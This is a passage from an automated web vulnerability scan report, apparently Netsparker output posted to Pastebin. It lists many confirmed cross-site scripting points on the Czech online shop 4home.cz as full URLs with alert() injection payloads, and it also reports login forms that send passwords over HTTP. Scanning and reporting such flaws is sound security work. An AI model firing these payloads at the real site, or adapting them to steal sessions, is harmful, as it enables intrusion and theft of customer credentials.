  598. Parameter Type: FullQueryString
  599. Attack Pattern: '"--></style></script><script>alert(0x00114D)</script>
  600.  
  601. Severity: Important
  602. Confirmation: Confirmed
  603. URL: http://www.4home.cz/protiskluzova-podlozka-do-sprchy/?'"--></style></script><script>alert(0x001164)</script>
  604. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  605. Parameter Name: Query Based
  606. Parameter Type: FullQueryString
  607. Attack Pattern: '"--></style></script><script>alert(0x001164)</script>
  608.  
  609. Severity: Important
  610. Confirmation: Confirmed
  611. URL: http://www.4home.cz/sada-bavlnenych-rucniku-2-kusy/?'"--></style></script><script>alert(0x001165)</script>
  612. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  613. Parameter Name: Query Based
  614. Parameter Type: FullQueryString
  615. Attack Pattern: '"--></style></script><script>alert(0x001165)</script>
  616.  
  617. Severity: Important
  618. Confirmation: Confirmed
  619. URL: http://www.4home.cz/sada-rucniku-ronda-2-kusy/?'"--></style></script><script>alert(0x001167)</script>
  620. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  621. Parameter Name: Query Based
  622. Parameter Type: FullQueryString
  623. Attack Pattern: '"--></style></script><script>alert(0x001167)</script>
  624.  
  625. Severity: Important
  626. Confirmation: Confirmed
  627. URL: http://www.4home.cz/detsky-zupan-jerry-fabrics-cars/?'"--></style></script><script>alert(0x00116F)</script>
  628. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  629. Parameter Name: Query Based
  630. Parameter Type: FullQueryString
  631. Attack Pattern: '"--></style></script><script>alert(0x00116F)</script>
  632.  
  633. Severity: Important
  634. Confirmation: Confirmed
  635. URL: http://www.4home.cz/detska-osuska-mickey-mouse/?'"--></style></script><script>alert(0x001174)</script>
  636. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  637. Parameter Name: Query Based
  638. Parameter Type: FullQueryString
  639. Attack Pattern: '"--></style></script><script>alert(0x001174)</script>
  640.  
  641. Severity: Important
  642. Confirmation: Confirmed
  643. URL: http://www.4home.cz/koupelnova-predlozka-grund-regent-vinova-60x90-cm/?'"--></style></script><script>alert(0x001183)</script>
  644. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  645. Parameter Name: Query Based
  646. Parameter Type: FullQueryString
  647. Attack Pattern: '"--></style></script><script>alert(0x001183)</script>
  648.  
  649. Severity: Important
  650. Confirmation: Confirmed
  651. URL: http://www.4home.cz/detsky-zupan-jerry-fabrics-princezny/?'"--></style></script><script>alert(0x001182)</script>
  652. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  653. Parameter Name: Query Based
  654. Parameter Type: FullQueryString
  655. Attack Pattern: '"--></style></script><script>alert(0x001182)</script>
  656.  
  657. Severity: Important
  658. Confirmation: Confirmed
  659. URL: http://www.4home.cz/koupelnova-predlozka-grund-regent-tmave-modra-60x90cm/?'"--></style></script><script>alert(0x0011DE)</script>
  660. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  661. Parameter Name: Query Based
  662. Parameter Type: FullQueryString
  663. Attack Pattern: '"--></style></script><script>alert(0x0011DE)</script>
  664.  
  665. Severity: Important
  666. Confirmation: Confirmed
  667. URL: http://www.4home.cz/detska-osuska-cars/?'"--></style></script><script>alert(0x0011F6)</script>
  668. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  669. Parameter Name: Query Based
  670. Parameter Type: FullQueryString
  671. Attack Pattern: '"--></style></script><script>alert(0x0011F6)</script>
  672.  
  673. Severity: Important
  674. Confirmation: Confirmed
  675. URL: http://www.4home.cz/hebke-bambusove-rucniky/?'"--></style></script><script>alert(0x001200)</script>
  676. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  677. Parameter Name: Query Based
  678. Parameter Type: FullQueryString
  679. Attack Pattern: '"--></style></script><script>alert(0x001200)</script>
  680.  
  681. Severity: Important
  682. Confirmation: Confirmed
  683. URL: http://www.4home.cz/zupan/?'"--></style></script><script>alert(0x0011FB)</script>
  684. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  685. Parameter Name: Query Based
  686. Parameter Type: FullQueryString
  687. Attack Pattern: '"--></style></script><script>alert(0x0011FB)</script>
  688.  
  689. Severity: Important
  690. Confirmation: Confirmed
  691. URL: http://www.4home.cz/wc-predlozka-grund-regent-vinova-60x50-cm/?'"--></style></script><script>alert(0x001203)</script>
  692. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  693. Parameter Name: Query Based
  694. Parameter Type: FullQueryString
  695. Attack Pattern: '"--></style></script><script>alert(0x001203)</script>
  696.  
  697. Severity: Important
  698. Confirmation: Confirmed
  699. URL: http://www.4home.cz/bambusove-rucniky/?'"--></style></script><script>alert(0x001214)</script>
  700. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  701. Parameter Name: Query Based
  702. Parameter Type: FullQueryString
  703. Attack Pattern: '"--></style></script><script>alert(0x001214)</script>
  704.  
  705. Severity: Important
  706. Confirmation: Confirmed
  707. URL: http://www.4home.cz/textilni-sprchovy-zaves-louka/?'"--></style></script><script>alert(0x001202)</script>
  708. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  709. Parameter Name: Query Based
  710. Parameter Type: FullQueryString
  711. Attack Pattern: '"--></style></script><script>alert(0x001202)</script>
  712.  
  713. Severity: Important
  714. Confirmation: Confirmed
  715. URL: http://www.4home.cz/koupelnova-predlozka-grund-regent-staroruzova-60x90-cm/?'"--></style></script><script>alert(0x00121C)</script>
  716. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  717. Parameter Name: Query Based
  718. Parameter Type: FullQueryString
  719. Attack Pattern: '"--></style></script><script>alert(0x00121C)</script>
  720.  
  721. Severity: Important
  722. Confirmation: Confirmed
  723. URL: http://www.4home.cz/zakarove-rucniky-s-pismenky/?'"--></style></script><script>alert(0x001220)</script>
  724. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  725. Parameter Name: Query Based
  726. Parameter Type: FullQueryString
  727. Attack Pattern: '"--></style></script><script>alert(0x001220)</script>
  728.  
  729. Severity: Important
  730. Confirmation: Confirmed
  731. URL: http://www.4home.cz/masazni-olej/?'"--></style></script><script>alert(0x0013E0)</script>
  732. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  733. Parameter Name: Query Based
  734. Parameter Type: FullQueryString
  735. Attack Pattern: '"--></style></script><script>alert(0x0013E0)</script>
  736.  
  737. Severity: Important
  738. Confirmation: Confirmed
  739. URL: http://www.4home.cz/sampanske-s-jahodou-k-malovani-na-telo/?'"--></style></script><script>alert(0x0013DE)</script>
  740. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  741. Parameter Name: Query Based
  742. Parameter Type: FullQueryString
  743. Attack Pattern: '"--></style></script><script>alert(0x0013DE)</script>
  744.  
  745. Severity: Important
  746. Confirmation: Confirmed
  747. URL: http://www.4home.cz/pirticky-sprchovy-gel-mydlo-pirticky/?'"--></style></script><script>alert(0x00140B)</script>
  748. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  749. Parameter Name: Query Based
  750. Parameter Type: FullQueryString
  751. Attack Pattern: '"--></style></script><script>alert(0x00140B)</script>
  752.  
  753. Severity: Important
  754. Confirmation: Confirmed
  755. URL: http://www.4home.cz/cokolada-k-malovani-na-telo/?'"--></style></script><script>alert(0x001409)</script>
  756. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  757. Parameter Name: Query Based
  758. Parameter Type: FullQueryString
  759. Attack Pattern: '"--></style></script><script>alert(0x001409)</script>
  760.  
  761. Severity: Important
  762. Confirmation: Confirmed
  763. URL: http://www.4home.cz/pirticky-sprchove-gely-pirticky-4-ks/?'"--></style></script><script>alert(0x001412)</script>
  764. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  765. Parameter Name: Query Based
  766. Parameter Type: FullQueryString
  767. Attack Pattern: '"--></style></script><script>alert(0x001412)</script>
  768.  
  769. Severity: Important
  770. Confirmation: Confirmed
  771. URL: http://www.4home.cz/osobni-vaha-concept-vo-2880-digitalni-sklenena-cerna/?'"--></style></script><script>alert(0x00141D)</script>
  772. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  773. Parameter Name: Query Based
  774. Parameter Type: FullQueryString
  775. Attack Pattern: '"--></style></script><script>alert(0x00141D)</script>
  776.  
  777. Severity: Important
  778. Confirmation: Confirmed
  779. URL: http://www.4home.cz/bylinne-kapky-gresik-zivotabudic-50-ml/?'"--></style></script><script>alert(0x001427)</script>
  780. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  781. Parameter Name: Query Based
  782. Parameter Type: FullQueryString
  783. Attack Pattern: '"--></style></script><script>alert(0x001427)</script>
  784.  
  785. Severity: Important
  786. Confirmation: Confirmed
  787. URL: http://www.4home.cz/bylinne-kapky-gresik-stihla-linie-50-ml/?'"--></style></script><script>alert(0x00143C)</script>
  788. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  789. Parameter Name: Query Based
  790. Parameter Type: FullQueryString
  791. Attack Pattern: '"--></style></script><script>alert(0x00143C)</script>
  792.  
  793. Severity: Important
  794. Confirmation: Confirmed
  795. URL: http://www.4home.cz/cistici-bylinne-kapky-gresik-50-ml/?'"--></style></script><script>alert(0x001481)</script>
  796. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  797. Parameter Name: Query Based
  798. Parameter Type: FullQueryString
  799. Attack Pattern: '"--></style></script><script>alert(0x001481)</script>
  800.  
  801. Severity: Important
  802. Confirmation: Confirmed
  803. URL: http://www.4home.cz/cevni-bylinne-kapky-gresik-50-ml/?'"--></style></script><script>alert(0x00148F)</script>
  804. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  805. Parameter Name: Query Based
  806. Parameter Type: FullQueryString
  807. Attack Pattern: '"--></style></script><script>alert(0x00148F)</script>
  808.  
  809. Severity: Important
  810. Confirmation: Confirmed
  811. URL: http://www.4home.cz/gresik-rooibos-5-druhu/?'"--></style></script><script>alert(0x00149D)</script>
  812. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  813. Parameter Name: Query Based
  814. Parameter Type: FullQueryString
  815. Attack Pattern: '"--></style></script><script>alert(0x00149D)</script>
  816.  
  817. Severity: Important
  818. Confirmation: Confirmed
  819. URL: http://www.4home.cz/zestihlujici-pas/?'"--></style></script><script>alert(0x0014A4)</script>
  820. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  821. Parameter Name: Query Based
  822. Parameter Type: FullQueryString
  823. Attack Pattern: '"--></style></script><script>alert(0x0014A4)</script>
  824.  
  825. Severity: Important
  826. Confirmation: Confirmed
  827. URL: http://www.4home.cz/spanelske-musky-s-prichuti/?'"--></style></script><script>alert(0x0014A6)</script>
  828. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  829. Parameter Name: Query Based
  830. Parameter Type: FullQueryString
  831. Attack Pattern: '"--></style></script><script>alert(0x0014A6)</script>
  832.  
  833. Severity: Important
  834. Confirmation: Confirmed
  835. URL: http://www.4home.cz/penovy-podhlavnik/?'"--></style></script><script>alert(0x0014B4)</script>
  836. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  837. Parameter Name: Query Based
  838. Parameter Type: FullQueryString
  839. Attack Pattern: '"--></style></script><script>alert(0x0014B4)</script>
  840.  
  841. Severity: Important
  842. Confirmation: Confirmed
  843. URL: http://www.4home.cz/overball/?'"--></style></script><script>alert(0x0014B6)</script>
  844. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  845. Parameter Name: Query Based
  846. Parameter Type: FullQueryString
  847. Attack Pattern: '"--></style></script><script>alert(0x0014B6)</script>
  848.  
  849. Severity: Important
  850. Confirmation: Confirmed
  851. URL: http://www.4home.cz/masazni-lavove-kameny/?'"--></style></script><script>alert(0x0014C0)</script>
  852. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  853. Parameter Name: Query Based
  854. Parameter Type: FullQueryString
  855. Attack Pattern: '"--></style></script><script>alert(0x0014C0)</script>
  856.  
  857. Severity: Important
  858. Confirmation: Confirmed
  859. URL: http://www.4home.cz/elektronicka-cigareta-ego-t-900mah/?'"--></style></script><script>alert(0x0014EB)</script>
  860. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  861. Parameter Name: Query Based
  862. Parameter Type: FullQueryString
  863. Attack Pattern: '"--></style></script><script>alert(0x0014EB)</script>
  864.  
  865. Severity: Important
  866. Confirmation: Confirmed
  867. URL: http://www.4home.cz/elektronicka-cigareta-ego-t-650mah/?'"--></style></script><script>alert(0x001508)</script>
  868. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  869. Parameter Name: Query Based
  870. Parameter Type: FullQueryString
  871. Attack Pattern: '"--></style></script><script>alert(0x001508)</script>
  872.  
  873. ||| [Possible] Cross-site Scripting
  874.  
  875. Severity: Medium
  876. Confirmation: Confirmed
  877. URL: http://www.4home.cz/hledat/?q=HledanA1 vA1raz&nsextt='"><net sparker=alert(0x0003DF)>
  878. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  879. Parameter Name: nsextt
  880. Parameter Type: Querystring
  881. Attack Pattern: '"><net sparker=netsparker(0x0003DF)>
  882.  
  883. Severity: Medium
  884. Confirmation: Confirmed
  885. URL: http://www.4home.cz/hledat/?q='"><net sparker=alert(0x000464)>
  886. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  887. Parameter Name: q
  888. Parameter Type: Querystring
  889. Attack Pattern: '"><net sparker=netsparker(0x000464)>
  890.  
  891. Severity: Medium
  892. Confirmation: Confirmed
  893. URL: http://www.4home.cz/bytovy-textil/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x000814)>&priceTo=5999&skladem=1&vyprodej=1
  894. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  895. Parameter Name: priceFrom
  896. Parameter Type: Querystring
  897. Attack Pattern: '"><net sparker=netsparker(0x000814)>
  898.  
  899. Severity: Medium
  900. Confirmation: Confirmed
  901. URL: http://www.4home.cz/bytovy-textil/?akce=1&novinky=1&priceFrom=69&priceTo='"><net sparker=alert(0x0008F6)>&skladem=1&vyprodej=1
  902. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  903. Parameter Name: priceTo
  904. Parameter Type: Querystring
  905. Attack Pattern: '"><net sparker=netsparker(0x0008F6)>
  906.  
  907. Severity: Medium
  908. Confirmation: Confirmed
  909. URL: http://www.4home.cz/bytove-doplnky/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x000CA0)>&priceTo=7990&skladem=1&vyprodej=1
  910. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  911. Parameter Name: priceFrom
  912. Parameter Type: Querystring
  913. Attack Pattern: '"><net sparker=netsparker(0x000CA0)>
  914.  
  915. Severity: Medium
  916. Confirmation: Confirmed
  917. URL: http://www.4home.cz/bytove-doplnky/?akce=1&novinky=1&priceFrom=29&priceTo='"><net sparker=alert(0x000EA3)>&skladem=1&vyprodej=1
  918. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  919. Parameter Name: priceTo
  920. Parameter Type: Querystring
  921. Attack Pattern: '"><net sparker=netsparker(0x000EA3)>
  922.  
  923. Severity: Medium
  924. Confirmation: Confirmed
  925. URL: http://www.4home.cz/elektro/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x00107A)>&priceTo=6999&skladem=1&vyprodej=1
  926. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  927. Parameter Name: priceFrom
  928. Parameter Type: Querystring
  929. Attack Pattern: '"><net sparker=netsparker(0x00107A)>
  930.  
  931. Severity: Medium
  932. Confirmation: Confirmed
  933. URL: http://www.4home.cz/elektro/?akce=1&novinky=1&priceFrom=79&priceTo='"><net sparker=alert(0x001190)>&skladem=1&vyprodej=1
  934. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  935. Parameter Name: priceTo
  936. Parameter Type: Querystring
  937. Attack Pattern: '"><net sparker=netsparker(0x001190)>
  938.  
  939. Severity: Medium
  940. Confirmation: Confirmed
  941. URL: http://www.4home.cz/koupelna/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x0012AB)>&priceTo=2995&skladem=1&vyprodej=1
  942. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  943. Parameter Name: priceFrom
  944. Parameter Type: Querystring
  945. Attack Pattern: '"><net sparker=netsparker(0x0012AB)>
  946.  
  947. Severity: Medium
  948. Confirmation: Confirmed
  949. URL: http://www.4home.cz/koupelna/?akce=1&novinky=1&priceFrom=65&priceTo='"><net sparker=alert(0x001435)>&skladem=1&vyprodej=1
  950. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  951. Parameter Name: priceTo
  952. Parameter Type: Querystring
  953. Attack Pattern: '"><net sparker=netsparker(0x001435)>
  954.  
  955. Severity: Medium
  956. Confirmation: Confirmed
  957. URL: http://www.4home.cz/krasa-a-zdravi/?akce=1&novinky=1&priceFrom='"><net sparker=alert(0x001544)>&priceTo=3999&skladem=1&vyprodej=1
  958. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  959. Parameter Name: priceFrom
  960. Parameter Type: Querystring
  961. Attack Pattern: '"><net sparker=netsparker(0x001544)>
  962.  
  963. Severity: Medium
  964. Confirmation: Confirmed
  965. URL: http://www.4home.cz/krasa-a-zdravi/?akce=1&novinky=1&priceFrom=49&priceTo='"><net sparker=alert(0x001571)>&skladem=1&vyprodej=1
  966. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  967. Parameter Name: priceTo
  968. Parameter Type: Querystring
  969. Attack Pattern: '"><net sparker=netsparker(0x001571)>
  970.  
  971. ||| Password Transmitted Over HTTP
  972.  
  973. Severity: Important
  974. Confirmation: Confirmed
  975. URL: http://www.4home.cz/registrace/
  976. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  977. Form target action: #loginForm
  978.  
  979. Severity: Important
  980. Confirmation: Confirmed
  981. Detection Accuracy :
  982. URL: http://www.4home.cz/uzivatel/
  983. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  984. Form target action: /uzivatel/#loginForm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!